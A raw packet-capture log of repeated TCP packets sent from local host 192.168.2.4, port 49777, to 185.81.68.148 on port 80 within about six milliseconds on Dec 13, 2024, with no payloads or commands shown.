Dec 13, 2024 07:47:47.371253967 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371273994 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371293068 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371310949 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371329069 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371351957 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371370077 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371387959 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371407032 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371436119 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371443033 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371470928 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371490002 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371512890 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371531963 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371550083 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371570110 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371592999 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371611118 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371630907 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371648073 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371665955 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371686935 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371706009 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371723890 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371742010 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371762037 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371781111 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371800900 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371819973 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371838093 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371857882 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371876001 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371893883 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371912956 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371931076 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371949911 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371968985 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371988058 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372006893 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372028112 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372047901 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372072935 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372087955 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372107983 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372128010 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372145891 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372164965 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372183084 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372203112 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372220993 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372240067 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372257948 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372276068 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372297049 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372318029 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372337103 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372355938 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372375011 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372396946 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372416973 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372433901 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372452021 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372472048 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372489929 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372508049 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372525930 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372544050 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372565985 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372585058 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372605085 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372623920 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372643948 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372662067 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372679949 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372700930 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372719049 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372736931 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372761965 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372781038 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372798920 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372817039 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372837067 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372854948 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372874022 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372894049 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372910976 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372931957 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372952938 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372971058 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.372987986 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373006105 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373025894 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373044968 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373064995 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373083115 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373101950 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373122931 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373141050 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373162031 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373178005 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373198986 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373218060 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373239040 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373259068 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373275995 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373295069 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373313904 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373332977 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373353004 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373373985 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373395920 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373414040 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373431921 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373450994 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373469114 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373490095 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373507023 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373527050 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373548031 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373564959 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373583078 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373601913 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373620033 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373642921 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373662949 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373681068 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373697996 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373718023 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373735905 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373754978 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373773098 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373795986 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373814106 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373835087 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373852968 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373872042 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373891115 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373908043 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373929977 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373950005 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373970032 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.373989105 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374007940 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374026060 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374056101 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374078035 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374097109 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374115944 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374135971 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374154091 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374174118 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374192953 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374212980 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374233007 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374253988 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374269009 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374289989 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374309063 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374329090 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374346972 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374366999 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374385118 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374403954 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374424934 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374442101 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374473095 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374483109 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374500990 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374520063 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374538898 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374558926 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374577999 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374597073 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374614000 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374634027 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374650955 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374671936 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374691010 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374711037 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374727964 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374749899 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374768019 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374788046 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374804974 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374825954 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374844074 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374865055 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374881983 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374898911 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374917984 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374937057 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374954939 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374974012 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.374991894 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375011921 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375029087 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375052929 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375065088 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375085115 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375102043 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375121117 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375138998 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375158072 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375174999 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375195026 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375214100 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375231981 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375250101 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375269890 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375292063 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375308990 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375328064 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375344038 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375365019 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375386000 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375401020 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375420094 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375438929 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375457048 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375475883 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375498056 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375518084 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375538111 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375555992 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375577927 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375596046 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375614882 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375632048 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375650883 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375668049 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375686884 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375705004 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375722885 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375741005 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375763893 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375778913 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375798941 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375818968 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375837088 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375857115 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375874043 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375891924 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375910997 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375931978 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375950098 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375968933 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.375987053 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376005888 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376024008 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376044035 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376061916 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376080036 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376097918 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376116037 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376133919 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376151085 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376168966 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376187086 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376207113 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376225948 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376244068 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376262903 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376283884 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376298904 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376317978 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376337051 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376354933 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376372099 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376389980 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376409054 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376427889 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376446009 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376465082 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376483917 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376502991 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376522064 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376538992 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376558065 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376574993 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376595020 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376614094 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376632929 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376650095 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376669884 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376686096 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376703978 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376724005 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376743078 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376763105 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376780987 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376797915 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376816034 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376833916 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376854897 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376873016 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376890898 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376909018 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376933098 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376949072 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376967907 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.376990080 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377007008 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377024889 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377043962 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377062082 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377079964 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377096891 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377115011 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377134085 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377154112 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377171040 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377188921 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377206087 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377224922 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377243996 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377263069 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377281904 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377300978 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377317905 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377336025 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377353907 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377376080 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377389908 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377408028 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377428055 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377445936 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377464056 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377484083 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377501011 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377522945 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377541065 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377558947 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377576113 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377593040 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377610922 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377628088 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377646923 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377664089 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377682924 CET	49777	80	192.168.2.4	185.81.68.148
